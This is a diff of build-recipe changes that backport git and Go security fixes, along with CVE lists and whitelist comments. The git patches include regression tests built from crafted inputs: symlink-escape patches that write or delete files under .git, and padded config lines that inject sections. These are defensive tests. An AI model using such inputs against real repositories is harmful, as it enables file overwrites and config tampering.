++	cat >patch <<-EOF &&
++	diff --git a/symlink b/renamed-symlink
++	similarity index 100%
++	rename from symlink
++	rename to renamed-symlink
++	--
++	diff --git a/renamed-symlink/modify-me b/renamed-symlink/modify-me
++	index 1111111..2222222 100644
++	--- a/renamed-symlink/modify-me
++	+++ b/renamed-symlink/modify-me
++	@@ -0,0 +1,1 @@
++	+busted
++	EOF
++
++	test_must_fail git apply patch 2>stderr &&
++	cat >expected_stderr <<-EOF &&
++	error: renamed-symlink/modify-me: No such file or directory
++	EOF
++	test_cmp expected_stderr stderr &&
++	test_must_be_empty .git/modify-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when deleting file' '
++	test_when_finished "git reset --hard && git clean -dfx && rm .git/delete-me" &&
++	touch .git/delete-me &&
++
++	cat >patch <<-EOF &&
++	diff --git a/symlink b/renamed-symlink
++	similarity index 100%
++	rename from symlink
++	rename to renamed-symlink
++	--
++	diff --git a/renamed-symlink/delete-me b/renamed-symlink/delete-me
++	deleted file mode 100644
++	index 1111111..0000000 100644
++	EOF
++
++	test_must_fail git apply patch 2>stderr &&
++	cat >expected_stderr <<-EOF &&
++	error: renamed-symlink/delete-me: No such file or directory
++	EOF
++	test_cmp expected_stderr stderr &&
++	test_path_is_file .git/delete-me
++'
++
+ test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-25652.patch b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
new file mode 100644
index 0000000000..d6b17a2b8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
@@ -0,0 +1,94 @@
+From 9db05711c98efc14f414d4c87135a34c13586e0b Mon Sep 17 00:00:00 2001
+From: Johannes Schindelin <johannes.schindelin@gmx.de>
+Date: Thu, 9 Mar 2023 16:02:54 +0100
+Subject: [PATCH] apply --reject: overwrite existing `.rej` symlink if it
+ exists
+
+The `git apply --reject` is expected to write out `.rej` files in case
+one or more hunks fail to apply cleanly. Historically, the command
+overwrites any existing `.rej` files. The idea being that
+apply/reject/edit cycles are relatively common, and the generated `.rej`
+files are not considered precious.
+
+But the command does not overwrite existing `.rej` symbolic links, and
+instead follows them. This is unsafe because the same patch could
+potentially create such a symbolic link and point at arbitrary paths
+outside the current worktree, and `git apply` would write the contents
+of the `.rej` file into that location.
+
+Therefore, let's make sure that any existing `.rej` file or symbolic
+link is removed before writing it.
+
+Reported-by: RyotaK <ryotak.mail@gmail.com>
+Helped-by: Taylor Blau <me@ttaylorr.com>
+Helped-by: Junio C Hamano <gitster@pobox.com>
+Helped-by: Linus Torvalds <torvalds@linuxfoundation.org>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/9db05711c98efc14f414d4c87135a34c13586e0b]
+CVE: CVE-2023-25652
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ apply.c                  | 14 ++++++++++++--
+ t/t4115-apply-symlink.sh | 15 +++++++++++++++
+ 2 files changed, 27 insertions(+), 2 deletions(-)
+
+diff --git a/apply.c b/apply.c
+index 4f303bf..aa7111d 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4531,7 +4531,7 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ 	FILE *rej;
+ 	char namebuf[PATH_MAX];
+ 	struct fragment *frag;
+-	int cnt = 0;
++	int fd, cnt = 0;
+ 	struct strbuf sb = STRBUF_INIT;
+ 
+ 	for (cnt = 0, frag = patch->fragments; frag; frag = frag->next) {
+@@ -4571,7 +4571,17 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ 	memcpy(namebuf, patch->new_name, cnt);
+ 	memcpy(namebuf + cnt, ".rej", 5);
+ 
+-	rej = fopen(namebuf, "w");
++	fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++	if (fd < 0) {
++		if (errno != EEXIST)
++			return error_errno(_("cannot open %s"), namebuf);
++		if (unlink(namebuf))
++			return error_errno(_("cannot unlink '%s'"), namebuf);
++		fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++		if (fd < 0)
++			return error_errno(_("cannot open %s"), namebuf);
++	}
++	rej = fdopen(fd, "w");
+ 	if (!rej)
+ 		return error_errno(_("cannot open %s"), namebuf);
+ 
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 1acb7b2..2b034ff 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -125,4 +125,19 @@ test_expect_success SYMLINKS 'symlink escape when deleting file' '
+ 	test_path_is_file .git/delete-me
+ '
+ 
++test_expect_success SYMLINKS '--reject removes .rej symlink if it exists' '
++	test_when_finished "git reset --hard && git clean -dfx" &&
++
++	test_commit file &&
++	echo modified >file.t &&
++	git diff -- file.t >patch &&
++	echo modified-again >file.t &&
++
++	ln -s foo file.t.rej &&
++	test_must_fail git apply patch --reject 2>err &&
++	test_i18ngrep "Rejected hunk" err &&
++	test_path_is_missing foo &&
++	test_path_is_file file.t.rej
++'
++
+ test_done
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-29007.patch b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
new file mode 100644
index 0000000000..e166c01412
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
@@ -0,0 +1,159 @@
+From 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Fri, 14 Apr 2023 11:46:59 -0400
+Subject: [PATCH] Merge branch 'tb/config-copy-or-rename-in-file-injection'
+
+Avoids issues with renaming or deleting sections with long lines, where
+configuration values may be interpreted as sections, leading to
+configuration injection. Addresses CVE-2023-29007.
+
+* tb/config-copy-or-rename-in-file-injection:
+  config.c: disallow overly-long lines in `copy_or_rename_section_in_file()`
+  config.c: avoid integer truncation in `copy_or_rename_section_in_file()`
+  config: avoid fixed-sized buffer when renaming/deleting a section
+  t1300: demonstrate failure when renaming sections with long lines
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/528290f8c61222433a8cf02fb7cfffa8438432b4]
+CVE: CVE-2023-29007
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ config.c          | 36 +++++++++++++++++++++++++-----------
+ t/t1300-config.sh | 30 ++++++++++++++++++++++++++++++
+ 2 files changed, 55 insertions(+), 11 deletions(-)
+
+diff --git a/config.c b/config.c
+index e7052b3..676b687 100644
+--- a/config.c
++++ b/config.c
+@@ -2987,9 +2987,10 @@ void git_config_set_multivar(const char *key, const char *value,
+ 					multi_replace);
+ }
+ 
+-static int section_name_match (const char *buf, const char *name)
++static size_t section_name_match (const char *buf, const char *name)
+ {
+-	int i = 0, j = 0, dot = 0;
++	size_t i = 0, j = 0;
++	int dot = 0;
+ 	if (buf[i] != '[')
+ 		return 0;
+ 	for (i = 1; buf[i] && buf[i] != ']'; i++) {
+@@ -3042,6 +3043,8 @@ static int section_name_is_ok(const char *name)
+ 	return 1;
+ }
+ 
++#define GIT_CONFIG_MAX_LINE_LEN (512 * 1024)
++
+ /* if new_name == NULL, the section is removed instead */
+ static int git_config_copy_or_rename_section_in_file(const char *config_filename,
+ 				      const char *old_name,
+@@ -3051,11 +3054,12 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ 	char *filename_buf = NULL;
+ 	struct lock_file lock = LOCK_INIT;
+ 	int out_fd;
+-	char buf[1024];
++	struct strbuf buf = STRBUF_INIT;
+ 	FILE *config_file = NULL;
+ 	struct stat st;
+ 	struct strbuf copystr = STRBUF_INIT;
+ 	struct config_store_data store;
++	uint32_t line_nr = 0;
+ 
+ 	memset(&store, 0, sizeof(store));
+ 
+@@ -3092,16 +3096,25 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ 		goto out;
+ 	}
+ 
+-	while (fgets(buf, sizeof(buf), config_file)) {
+-		int i;
+-		int length;
++	while (!strbuf_getwholeline(&buf, config_file, '\n')) {
++		size_t i, length;
+ 		int is_section = 0;
+-		char *output = buf;
+-		for (i = 0; buf[i] && isspace(buf[i]); i++)
++		char *output = buf.buf;
++
++		line_nr++;
++
++		if (buf.len >= GIT_CONFIG_MAX_LINE_LEN) {
++			ret = error(_("refusing to work with overly long line "
++				      "in '%s' on line %"PRIuMAX),
++				    config_filename, (uintmax_t)line_nr);
++			goto out;
++		}
++
++		for (i = 0; buf.buf[i] && isspace(buf.buf[i]); i++)
+ 			; /* do nothing */
+-		if (buf[i] == '[') {
++		if (buf.buf[i] == '[') {
+ 			/* it's a section */
+-			int offset;
++			size_t offset;
+ 			is_section = 1;
+ 
+ 			/*
+@@ -3118,7 +3131,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ 				strbuf_reset(&copystr);
+ 			}
+ 
+-			offset = section_name_match(&buf[i], old_name);
++			offset = section_name_match(&buf.buf[i], old_name);
+ 			if (offset > 0) {
+ 				ret++;
+ 				if (new_name == NULL) {
+@@ -3193,6 +3206,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ out_no_rollback:
+ 	free(filename_buf);
+ 	config_store_data_clear(&store);
++	strbuf_release(&buf);
+ 	return ret;
+ }
+ 
+diff --git a/t/t1300-config.sh b/t/t1300-config.sh
+index 983a0a1..9b67f6b 100755
+--- a/t/t1300-config.sh
++++ b/t/t1300-config.sh
+@@ -616,6 +616,36 @@ test_expect_success 'renaming to bogus section is rejected' '
+ 	test_must_fail git config --rename-section branch.zwei "bogus name"
+ '
+ 
++test_expect_success 'renaming a section with a long line' '
++	{
++		printf "[b]\\n" &&
++		printf "  c = d %1024s [a] e = f\\n" " " &&
++		printf "[a] g = h\\n"
++	} >y &&
++	git config -f y --rename-section a xyz &&
++	test_must_fail git config -f y b.e
++'
++
++test_expect_success 'renaming an embedded section with a long line' '
++	{
++		printf "[b]\\n" &&
++		printf "  c = d %1024s [a] [foo] e = f\\n" " " &&
++		printf "[a] g = h\\n"
++	} >y &&
++	git config -f y --rename-section a xyz &&
++	test_must_fail git config -f y foo.e
++'
++
++test_expect_success 'renaming a section with an overly-long line' '
++	{
++		printf "[b]\\n" &&
++		printf "  c = d %525000s e" " " &&
++		printf "[a] g = h\\n"
++	} >y &&
++	test_must_fail git config -f y --rename-section a xyz 2>err &&
++	test_i18ngrep "refusing to work with overly long line in .y. on line 2" err
++'
++
+ cat >> .git/config << EOF
+   [branch "zwei"] a = 1 [branch "vier"]
+ EOF
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/git/git.inc b/meta/recipes-devtools/git/git.inc
index 4131c98977..e64472ea28 100644
--- a/meta/recipes-devtools/git/git.inc
+++ b/meta/recipes-devtools/git/git.inc
@@ -1,5 +1,6 @@
 SUMMARY = "Distributed version control system"
 HOMEPAGE = "http://git-scm.com"
+DESCRIPTION = "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency."
 SECTION = "console/utils"
 LICENSE = "GPLv2"
 DEPENDS = "openssl curl zlib expat"
@@ -7,14 +8,44 @@ DEPENDS = "openssl curl zlib expat"
 PROVIDES_append_class-native = " git-replacement-native"
 
 SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
-           ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
+           ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \
+           file://fixsort.patch \
+           file://CVE-2021-40330.patch \
+           file://CVE-2022-23521.patch \
+           file://CVE-2022-41903-01.patch \
+           file://CVE-2022-41903-02.patch \
+           file://CVE-2022-41903-03.patch \
+           file://CVE-2022-41903-04.patch \
+           file://CVE-2022-41903-05.patch \
+           file://CVE-2022-41903-06.patch \
+           file://CVE-2022-41903-07.patch \
+           file://CVE-2022-41903-08.patch \
+           file://CVE-2022-41903-09.patch \
+           file://CVE-2022-41903-10.patch \
+           file://CVE-2022-41903-11.patch \
+           file://CVE-2022-41903-12.patch \
+           file://CVE-2023-22490-1.patch \
+           file://CVE-2023-22490-2.patch \
+           file://CVE-2023-22490-3.patch \
+           file://CVE-2023-23946.patch \
+           file://CVE-2023-29007.patch \
+           file://CVE-2023-25652.patch \
+           "
 S = "${WORKDIR}/git-${PV}"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1"
 
 CVE_PRODUCT = "git-scm:git"
 
+# This is about a manpage not mentioning --mirror may "leak" information
+# in mirrored git repos. Most OE users wouldn't build the docs and
+# we don't see this as a major issue for our general users/usecases.
+CVE_CHECK_WHITELIST += "CVE-2022-24975"
+# This is specific to Git-for-Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41953"
+# specific to Git for Windows
+CVE_CHECK_WHITELIST += "CVE-2023-22743"
+
 PACKAGECONFIG ??= ""
 PACKAGECONFIG[cvsserver] = ""
 PACKAGECONFIG[svn] = ""
diff --git a/meta/recipes-devtools/git/git/fixsort.patch b/meta/recipes-devtools/git/git/fixsort.patch
new file mode 100644
index 0000000000..eec1f84945
--- /dev/null
+++ b/meta/recipes-devtools/git/git/fixsort.patch
@@ -0,0 +1,36 @@
+[PATCH] generate-cmdlist.sh: Fix determinism issue
+
+Currently git binaries are not entirely reproducible, at least partly 
+due to config-list.h differing in order depending on the system's
+locale settings. Under different locales, the entries:
+
+"sendemail.identity",
+"sendemail.<identity>.*",
+
+would differ in order for example and this leads to differences in 
+the debug symbols for the binaries.
+
+This can be fixed by specifying the C locale for the sort in the
+shell script generating the header.
+
+Note: This is a backport of Richard Purdie's original patch for a more
+recent version of git. The offending code in this older version is
+in generate-cmdlist.sh. The upstream current version has this code
+in generate-configlist.sh.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u]
+
+index 71158f7..c137091 100755
+--- a/generate-cmdlist.sh
++++ b/generate-cmdlist.sh
+@@ -82,7 +82,7 @@ static const char *config_name_list[] = {
+ EOF
+ 	grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt |
+ 	sed '/deprecated/d; s/::$//; s/,  */\n/g' |
+-	sort |
++	LC_ALL=C sort |
+ 	while read line
+ 	do
+ 		echo "	\"$line\","
diff --git a/meta/recipes-devtools/git/git_2.24.3.bb b/meta/recipes-devtools/git/git_2.24.4.bb
index ddd875f07b..f38c25f0ef 100644
--- a/meta/recipes-devtools/git/git_2.24.3.bb
+++ b/meta/recipes-devtools/git/git_2.24.4.bb
@@ -5,5 +5,5 @@ EXTRA_OECONF += "ac_cv_snprintf_returns_bogus=no \
                  "
 EXTRA_OEMAKE += "NO_GETTEXT=1"
 
-SRC_URI[tarball.sha256sum] = "ef6d1d1de1d7921a54d23d07479bd2766f050d6435cea5d3b5322aa4897cb3d7"
-SRC_URI[manpages.sha256sum] = "325795ba33c0be02370de79636f32ad3b447665c1f2b5b4de65181fa804bed31"
+SRC_URI[tarball.sha256sum] = "6e119e70d3762f28e1dc9928c526eb4d7519fd3870f862775cd10186653eb85a"
+SRC_URI[manpages.sha256sum] = "e687bcc91a6fd9cb74243f91a9c2d77c50ce202a09b35931021ecc521a373ed5"
diff --git a/meta/recipes-devtools/glide/glide_0.13.3.bb b/meta/recipes-devtools/glide/glide_0.13.3.bb
index 31295edf90..21773d91f9 100644
--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -1,10 +1,11 @@
 SUMMARY = "Vendor Package Management for Golang"
-HOMEPAGE = "https://glide.sh"
+HOMEPAGE = "https://github.com/Masterminds/glide"
+DESCRIPTION = "Glide is a Vendor Package Management for Golang"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
 
 GO_IMPORT = "github.com/Masterminds/glide"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
 SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
 
 inherit go
diff --git a/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
index 48b7e6d4a6..05cd6a1e63 100644
--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "gnu-configize"
 DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree"
+HOMEPAGE = "https://git.savannah.gnu.org/cgit/config.git"
 SECTION = "devel"
 LICENSE = "GPL-3.0-with-autoconf-exception"
 LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a"
@@ -11,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
 SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0"
 PV = "20200117+git${SRCPV}"
 
-SRC_URI = "git://git.savannah.gnu.org/config.git \
+SRC_URI = "git://git.savannah.gnu.org/git/config.git;protocol=https;branch=master \
            file://gnu-configize.in"
 S = "${WORKDIR}/git"
 UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index 8f8ed89de8..9c7ceda891 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -1,7 +1,7 @@
 require go-common.inc
 
 GO_BASEVERSION = "1.14"
-GO_MINOR = ".7"
+GO_MINOR = ".15"
 PV .= "${GO_MINOR}"
 FILESEXTRAPATHS_prepend := "${FILE_DIRNAME}/go-${GO_BASEVERSION}:"
 
@@ -16,6 +16,112 @@ SRC_URI += "\
     file://0006-cmd-dist-separate-host-and-target-builds.patch \
     file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
     file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
+    file://CVE-2021-34558.patch \
+    file://CVE-2021-33196.patch \
+    file://CVE-2021-33197.patch \
+    file://CVE-2021-38297.patch \
+    file://CVE-2022-23806.patch \
+    file://CVE-2022-23772.patch \
+    file://CVE-2021-44717.patch \
+    file://CVE-2022-24675.patch \
+    file://CVE-2021-31525.patch \
+    file://CVE-2022-30629.patch \
+    file://CVE-2022-30631.patch \
+    file://CVE-2022-30632.patch \
+    file://CVE-2022-30633.patch \
+    file://CVE-2022-30635.patch \
+    file://CVE-2022-32148.patch \
+    file://CVE-2022-32189.patch \
+    file://CVE-2021-27918.patch \
+    file://CVE-2021-36221.patch \
+    file://CVE-2021-39293.patch \
+    file://CVE-2021-41771.patch \
+    file://CVE-2022-27664.patch \
+    file://0001-CVE-2022-32190.patch \
+    file://0002-CVE-2022-32190.patch \
+    file://0003-CVE-2022-32190.patch \
+    file://0004-CVE-2022-32190.patch \
+    file://CVE-2022-2880.patch \
+    file://CVE-2022-2879.patch \
+    file://CVE-2021-33195.patch \
+    file://CVE-2021-33198.patch \
+    file://CVE-2021-44716.patch \
+    file://CVE-2022-24921.patch \
+    file://CVE-2022-28131.patch \
+    file://CVE-2022-28327.patch \
+    file://CVE-2022-41715.patch \
+    file://CVE-2022-41717.patch \
+    file://CVE-2022-1962.patch \
+    file://CVE-2022-41723.patch \
+    file://CVE-2022-41722-1.patch \
+    file://CVE-2022-41722-2.patch \
+    file://CVE-2020-29510.patch \
+    file://CVE-2023-24537.patch \
+    file://CVE-2023-24534.patch \
+    file://CVE-2023-24538-1.patch \
+    file://CVE-2023-24538-2.patch \
+    file://CVE-2023-24538_3.patch \
+    file://CVE-2023-24538_4.patch \
+    file://CVE-2023-24538_5.patch \
+    file://CVE-2023-24538_6.patch \
+    file://CVE-2023-24539.patch \
+    file://CVE-2023-24540.patch \
+    file://CVE-2023-29405-1.patch \
+    file://CVE-2023-29405-2.patch \
+    file://CVE-2023-29402.patch \
+    file://CVE-2023-29404.patch \
+    file://CVE-2023-29400.patch \
+    file://CVE-2023-29406-1.patch \
+    file://CVE-2023-29406-2.patch \
+    file://CVE-2023-29409.patch \
+    file://CVE-2022-41725-pre1.patch \
+    file://CVE-2022-41725-pre2.patch \
+    file://CVE-2022-41725-pre3.patch \
+    file://CVE-2022-41725.patch \
+    file://CVE-2023-24536_1.patch \
+    file://CVE-2023-24536_2.patch \
+    file://CVE-2023-24536_3.patch \
+    file://CVE-2023-39318.patch \
+    file://CVE-2023-39319.patch \
+    file://CVE-2023-39326.patch \
+    file://CVE-2023-45287-pre1.patch \
+    file://CVE-2023-45287-pre2.patch \
+    file://CVE-2023-45287-pre3.patch \
+    file://CVE-2023-45287.patch \
+    file://CVE-2023-45289.patch \
+    file://CVE-2023-45290.patch \
+    file://CVE-2024-24785.patch \
+    file://CVE-2024-24784.patch \
 "
+
 SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
-SRC_URI[main.sha256sum] = "064392433563660c73186991c0a315787688e7c38a561e26647686f89b6c30e3"
+SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
+
+# Upstream don't believe it is a signifiant real world issue and will only
+# fix in 1.17 onwards where we can drop this.
+# https://github.com/golang/go/issues/30999#issuecomment-910470358
+CVE_CHECK_WHITELIST += "CVE-2021-29923"
+
+# this issue affected go1.15 onwards
+# https://security-tracker.debian.org/tracker/CVE-2022-29526
+CVE_CHECK_WHITELIST += "CVE-2022-29526"
+
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2022-29804"
+CVE_CHECK_WHITELIST += "CVE-2022-30580"
+CVE_CHECK_WHITELIST += "CVE-2022-30634"
+
+# Issue is in golang.org/x/net/html/parse.go, not used in go compiler
+CVE_CHECK_WHITELIST += "CVE-2021-33194"
+
+# Issue introduced in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2021-41772"
+
+# Fixes code that was added in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-30630"
+
+# This is specific to Microsoft Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41716"
+
+# Issue introduced in go1.15beta1, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-1705"
diff --git a/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
new file mode 100644
index 0000000000..ad263b8023
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
@@ -0,0 +1,74 @@
+From 755f2dc35a19e6806de3ecbf836fa06ad875c67a Mon Sep 17 00:00:00 2001
+From: Carl Johnson <me@carlmjohnson.net>
+Date: Fri, 4 Mar 2022 14:49:52 +0000
+Subject: [PATCH 1/4] net/url: add JoinPath, URL.JoinPath
+
+Builds on CL 332209.
+
+Fixes #47005
+
+Change-Id: I82708dede05d79a196ca63f5a4e7cb5ac9a041ea
+GitHub-Last-Rev: 51b735066eef74f5e67c3e8899c58f44c0383c61
+GitHub-Pull-Request: golang/go#50383
+Reviewed-on: https://go-review.googlesource.com/c/go/+/374654
+Reviewed-by: Russ Cox <rsc@golang.org>
+Auto-Submit: Russ Cox <rsc@golang.org>
+Trust: Ian Lance Taylor <iant@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/604140d93111f89911e17cb147dcf6a02d2700d0]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 23 +++++++++++++++++++++++
+ 1 file changed, 23 insertions(+)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 2880e82..dea8bfe 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -13,6 +13,7 @@ package url
+ import (
+	"errors"
+	"fmt"
++	"path"
+	"sort"
+	"strconv"
+	"strings"
+@@ -1104,6 +1105,17 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+	return nil
+ }
+
++// JoinPath returns a new URL with the provided path elements joined to
++// any existing path and the resulting path cleaned of any ./ or ../ elements.
++func (u *URL) JoinPath(elem ...string) *URL {
++	url := *u
++	if len(elem) > 0 {
++		elem = append([]string{u.Path}, elem...)
++		url.setPath(path.Join(elem...))
++	}
++	return &url
++}
++
+ // validUserinfo reports whether s is a valid userinfo string per RFC 3986
+ // Section 3.2.1:
+ //     userinfo    = *( unreserved / pct-encoded / sub-delims / ":" )
+@@ -1144,3 +1156,14 @@ func stringContainsCTLByte(s string) bool {
+	}
+	return false
+ }
++
++// JoinPath returns a URL string with the provided path elements joined to
++// the existing path of base and the resulting path cleaned of any ./ or ../ elements.
++func JoinPath(base string, elem ...string) (result string, err error) {
++	url, err := Parse(base)
++	if err != nil {
++		return
++	}
++	result = url.JoinPath(elem...).String()
++	return
++}
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
new file mode 100644
index 0000000000..1a11cc72bc
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
@@ -0,0 +1,48 @@
+From 985108de87e7d2ecb2b28cb53b323d530387b884 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 31 Mar 2022 13:21:39 -0700
+Subject: [PATCH 2/4] net/url: preserve a trailing slash in JoinPath
+
+Fixes #52074
+
+Change-Id: I30897f32e70a6ca0c4e11aaf07088c27336efaba
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397256
+Trust: Ian Lance Taylor <iant@golang.org>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matt Layher <mdlayher@gmail.com>
+Trust: Matt Layher <mdlayher@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/dbb52cc9f3e83a3040f46c2ae7650c15ab342179]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index dea8bfe..3436707 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1107,11 +1107,18 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+
+ // JoinPath returns a new URL with the provided path elements joined to
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
++// Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+	url := *u
+	if len(elem) > 0 {
+		elem = append([]string{u.Path}, elem...)
+-		url.setPath(path.Join(elem...))
++		p := path.Join(elem...)
++		// path.Join will remove any trailing slashes.
++		// Preserve at least one.
++		if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++			p += "/"
++		}
++		url.setPath(p)
+	}
+	return &url
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
new file mode 100644
index 0000000000..816d914983
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
@@ -0,0 +1,36 @@
+From 2c632b883b0f11084cc247c8b50ad6c71fa7b447 Mon Sep 17 00:00:00 2001
+From: Sean Liao <sean@liao.dev>
+Date: Sat, 9 Jul 2022 18:38:45 +0100
+Subject: [PATCH 3/4] net/url: use EscapedPath for url.JoinPath
+
+Fixes #53763
+
+Change-Id: I08b53f159ebdce7907e8cc17316fd0c982363239
+Reviewed-on: https://go-review.googlesource.com/c/go/+/416774
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf5898ef53d1693aa572da0da746c05e9a6f15c5]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 3436707..73079a5 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1111,7 +1111,7 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ func (u *URL) JoinPath(elem ...string) *URL {
+	url := *u
+	if len(elem) > 0 {
+-		elem = append([]string{u.Path}, elem...)
++		elem = append([]string{u.EscapedPath()}, elem...)
+		p := path.Join(elem...)
+		// path.Join will remove any trailing slashes.
+		// Preserve at least one.
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
new file mode 100644
index 0000000000..4bdff3aed4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
@@ -0,0 +1,82 @@
+From f61e428699cbb52bab31fe2c124f49d085a209fe Mon Sep 17 00:00:00 2001
